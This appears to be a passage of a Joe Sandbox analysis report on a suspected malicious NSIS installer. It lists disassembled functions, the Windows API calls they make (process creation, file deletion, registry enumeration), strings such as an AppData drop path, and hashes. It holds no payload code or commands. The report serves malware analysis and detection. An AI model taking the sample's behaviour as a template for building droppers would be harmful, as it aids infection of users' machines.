Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Roaming\china\Mixeren\verbalises
API String ID: 1892508949-1206852091
Opcode ID: 7c082fd94d62b49e0a0772216ac902d0a5e288ced7259b00feb75cd76b1be880
Instruction ID: f000a06b92b438bb55e13d50866b264c9e4ef6e61e5cb38cc97b05dde0840845
Opcode Fuzzy Hash: 7c082fd94d62b49e0a0772216ac902d0a5e288ced7259b00feb75cd76b1be880
Instruction Fuzzy Hash: 3F110436504151BFEF217B654C405BF27B0EA92324738467FE592B22E6C63C0A42AA3E

Function 004059C3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00405E63: lstrcpynA.KERNEL32(?,?,00000400,004032D9,00422F20,NSIS Error), ref: 00405E70

Part of subcall function 0040596E: CharNextA.USER32(?,?,C:\,?,004059DA,C:\,C:\,771B3410,?,771B2EE0,00405725,?,771B3410,771B2EE0,00000000), ref: 0040597C
Part of subcall function 0040596E: CharNextA.USER32(00000000), ref: 00405981
Part of subcall function 0040596E: CharNextA.USER32(00000000), ref: 00405995

lstrlenA.KERNEL32(C:\,00000000,C:\,C:\,771B3410,?,771B2EE0,00405725,?,771B3410,771B2EE0,00000000), ref: 00405A16
GetFileAttributesA.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,771B3410,?,771B2EE0,00405725,?,771B3410,771B2EE0), ref: 00405A26

Strings

C:\, xrefs: 004059C9, 004059CE, 004059D4, 00405A0F, 00405A15, 00405A1D, 00405A25

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\
API String ID: 3248276644-3404278061
Opcode ID: 0ef386635608f692f0e7c0f61560742430c47c7f4d5a656852c6bdb0725f2d70
Instruction ID: c86e2d8d38d71570b191e9a15eff5061e4cbb4187268480765cc96090d0558f9
Opcode Fuzzy Hash: 0ef386635608f692f0e7c0f61560742430c47c7f4d5a656852c6bdb0725f2d70
Instruction Fuzzy Hash: A2F07D71200D5052C73233350C4669F1644CE82374708023BF8A0B22D2D73C8D02CD7D

Function 004055F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421538,Error launching installer), ref: 0040561D
CloseHandle.KERNEL32(?), ref: 0040562A

Strings

Error launching installer, xrefs: 00405607

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 8605fb0cc1bd08462260b177f6e223d0fe872a64a1cb3e3de70a479640e30f4e
Instruction ID: f5a249c54adfd8c255b7380a03a9b1716d63bb632b604881324be9db7dcd8e21
Opcode Fuzzy Hash: 8605fb0cc1bd08462260b177f6e223d0fe872a64a1cb3e3de70a479640e30f4e
Instruction Fuzzy Hash: EAE0BFB4A002097FEB109B64ED45F7B76ACEB10704F908571BD15F2160D678A9518A79

Function 004068E3 Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8132e083a1160923351ce27f8cc58d18c93b4828372388658a00552e8c1634b1
Instruction ID: 9d08257b753d1dc8d50a425e5d18a9377fc83dd762af72a05302a0d5f43d32a7
Opcode Fuzzy Hash: 8132e083a1160923351ce27f8cc58d18c93b4828372388658a00552e8c1634b1
Instruction Fuzzy Hash: EDA13571E00228CBDB28CFA9C8547ADBBB1FF44305F15816ED856BB281D7785A96CF44

Function 00406AE4 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cd2b84360dd7c3bf672bcc78a832e40c60aaabd2d33ded0d5d318971a638696
Instruction ID: 4069c4fc72520be48e16bfd385b53c7c255c7f0e47fd3261c7dbfe51bff91a5a
Opcode Fuzzy Hash: 8cd2b84360dd7c3bf672bcc78a832e40c60aaabd2d33ded0d5d318971a638696
Instruction Fuzzy Hash: 0B913470E04228CBEF28CF99C8547ADBBB1FF44305F15816AD856BB291C378A996CF44

Function 004067FA Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41c8aa7f72f1f93a2cbcdf9f632d1ef5542b7afda86631119225c1b51720529c
Instruction ID: e16a5cd5122dbeef30614bcf2b0def54f3f28e6aa070a3c0d2e235184150711d
Opcode Fuzzy Hash: 41c8aa7f72f1f93a2cbcdf9f632d1ef5542b7afda86631119225c1b51720529c
Instruction Fuzzy Hash: B1814771E04228CBDF24CFA9C8447ADBBB1FF44305F25816AD856BB281C7789996CF54

Function 004062FF Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 344cb5358226c0404198c7d180aef45b95627368966a6db8480b9102282d8a8c
Instruction ID: 250af7da94f29308333f8738aaa2927d74ee5fc9a8e658dcecc26e0f3faccd11
Opcode Fuzzy Hash: 344cb5358226c0404198c7d180aef45b95627368966a6db8480b9102282d8a8c
Instruction Fuzzy Hash: A7816631E04228DBDF24CFA9C8447AEBBB1FF44305F11816AD856BB281C7785A96CF54

Function 0040674D Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fcb4a8d7ef675eb47b5d59acfe40d72c7d0968365e25b36553ac1c3905db65f
Instruction ID: d3a2940f28ad1956632bfd73bee9eff7b9b7c3d901c1c2bf8e917ae235022c86
Opcode Fuzzy Hash: 2fcb4a8d7ef675eb47b5d59acfe40d72c7d0968365e25b36553ac1c3905db65f
Instruction Fuzzy Hash: 2D713471E00228DBDF24CFA9C8547ADBBB1FF44305F15806AD816BB281C778AA96DF54

Function 0040686B Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da2f706e7974a2021bad9ffdb380539c5442a57272a58128905f842303d595e8
Instruction ID: aa5f261e6b50ba4db5ffebf04d3efdb0ff665d1262494a5322ec58a673e68ddc
Opcode Fuzzy Hash: da2f706e7974a2021bad9ffdb380539c5442a57272a58128905f842303d595e8
Instruction Fuzzy Hash: 91715671E00228DBDF28CF99C854BADBBB1FF44305F15806AD816BB281C778A992DF54

Function 004067B7 Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: feb90363471a84b63e8ff2d487282df12a040b782cd1455c92e9c1b62a64594c
Instruction ID: ff328c296e0f6909f1720754cbeef76fe0f6b635d5236ea2459b9db161edb35a
Opcode Fuzzy Hash: feb90363471a84b63e8ff2d487282df12a040b782cd1455c92e9c1b62a64594c
Instruction Fuzzy Hash: 9F715771E00228DBEF28CF99C8547ADBBB1FF44305F15806AD856BB281C778AA56DF44

Function 00403064 Relevance: 4.6, APIs: 3, Instructions: 101COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00403078

Part of subcall function 004031E3: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EE1,?), ref: 004031F1

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00402F8E,00000004,00000000,00000000,?,?,00402F08,000000FF,00000000,00000000,00409130,?), ref: 004030AB
SetFilePointer.KERNELBASE(0039954F,00000000,00000000,004128D8,00004000,?,00000000,00402F8E,00000004,00000000,00000000,?,?,00402F08,000000FF,00000000), ref: 004031A6

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: FilePointer$CountTick
String ID:
API String ID: 1092082344-0
Opcode ID: a36c4bf57cb6e858ef063313d681270ada8638ec8a77c6c3e08efa629b838403
Instruction ID: 32da71d67e65fe5252f8ded7d9303c2dcf981c5e4867c3c67dada36b4a4d5a13
Opcode Fuzzy Hash: a36c4bf57cb6e858ef063313d681270ada8638ec8a77c6c3e08efa629b838403
Instruction Fuzzy Hash: DD31B2B29012109FDB10BF2AFE4086A3BECE748356715823BE400B62E0C739DD52DB5E

Function 004021D2 Relevance: 4.6, APIs: 3, Instructions: 51stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406167: FindFirstFileA.KERNELBASE(771B3410,00421580,C:\,00405A06,C:\,C:\,00000000,C:\,C:\,771B3410,?,771B2EE0,00405725,?,771B3410,771B2EE0), ref: 00406172
Part of subcall function 00406167: FindClose.KERNEL32(00000000), ref: 0040617E

lstrlenA.KERNEL32 ref: 00402212
lstrlenA.KERNEL32(00000000), ref: 0040221C
SHFileOperationA.SHELL32(?,?,?,00000000), ref: 00402244

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: FileFindlstrlen$CloseFirstOperation
String ID:
API String ID: 1486964399-0
Opcode ID: 61c72c3acbeab377fc67236d864babf069cda309619979ed43041b7e4bbdfd7d
Instruction ID: 708f0fc9269f5af075d905106071f31bae39c4f67462bfddc0a38c2d79fef8c9
Opcode Fuzzy Hash: 61c72c3acbeab377fc67236d864babf069cda309619979ed43041b7e4bbdfd7d
Instruction Fuzzy Hash: FE112171904318AADB10EFB58945A9EB7F8AF14318F10853BA505FB2D2D6BCC9448B59

Function 00401E44 Relevance: 4.5, APIs: 3, Instructions: 48synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 0040507C: lstrlenA.KERNEL32(Remove folder: C:\Users\user~1\AppData\Local\Temp\nsv37AB.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000,?), ref: 004050B5
Part of subcall function 0040507C: lstrlenA.KERNEL32(00402C8E,Remove folder: C:\Users\user~1\AppData\Local\Temp\nsv37AB.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000), ref: 004050C5
Part of subcall function 0040507C: lstrcatA.KERNEL32(Remove folder: C:\Users\user~1\AppData\Local\Temp\nsv37AB.tmp\,00402C8E,00402C8E,Remove folder: C:\Users\user~1\AppData\Local\Temp\nsv37AB.tmp\,00000000,00000000,00000000), ref: 004050D8
Part of subcall function 0040507C: SetWindowTextA.USER32(Remove folder: C:\Users\user~1\AppData\Local\Temp\nsv37AB.tmp\,Remove folder: C:\Users\user~1\AppData\Local\Temp\nsv37AB.tmp\), ref: 004050EA
Part of subcall function 0040507C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405110
Part of subcall function 0040507C: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040512A
Part of subcall function 0040507C: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405138

Part of subcall function 004055F4: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421538,Error launching installer), ref: 0040561D
Part of subcall function 004055F4: CloseHandle.KERNEL32(?), ref: 0040562A

WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E7E
GetExitCodeProcess.KERNEL32(?,?), ref: 00401E8E
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EB3

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
String ID:
API String ID: 3521207402-0
Opcode ID: a33023bfda2542b486336c0229f0f2454b563ffb6bd9b7eab009217adf710acc
Instruction ID: 8164f88ac99e46b686dec60b6f66323921365fc284b2c72d55c18730983d64c3
Opcode Fuzzy Hash: a33023bfda2542b486336c0229f0f2454b563ffb6bd9b7eab009217adf710acc
Instruction Fuzzy Hash: 97015731904114EBDF11AFA1C98899F7BB2EF00344F20817BF601B52E1C7789A419B9A

Function 00402482 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402B44: RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C

RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024B0
RegEnumValueA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024C3
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user~1\AppData\Local\Temp\nsv37AB.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024D8

Memory Dump Source

Source File: 00000001.00000002.1327788379.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1327766577.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327807998.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000411000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1327857401.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1328119948.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_lkETeneRL3.jbxd

Similarity

API ID: Enum$CloseOpenValue
String ID:
API String ID: 167947723-0
Opcode ID: 47ab25418fb38c8c5b03f0ebc620af0af5168f3c50133958f6b2384b9cd533c1
Instruction ID: e09e8e067f2b8771eb66943483239aed03eb61d96520190a1401bf15a77a7747
Opcode Fuzzy Hash: 47ab25418fb38c8c5b03f0ebc620af0af5168f3c50133958f6b2384b9cd533c1
Instruction Fuzzy Hash: BAF0AD72A04200BFEB11AF659E88EBB7A6DEB80344B10443AF505A61C0D6B84A459A7A

Function 004056BD Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00405AB1: GetFileAttributesA.KERNELBASE(?,?,004056C9,?,?,00000000,004058AC,?,?,?,?), ref: 00405AB6
Part of subcall function 00405AB1: SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405ACA

RemoveDirectoryA.KERNELBASE(?,?,?,00000000,004058AC), ref: 004056D8
DeleteFileA.KERNELBASE(?,?,?,00000000,004058AC), ref: 004056E0
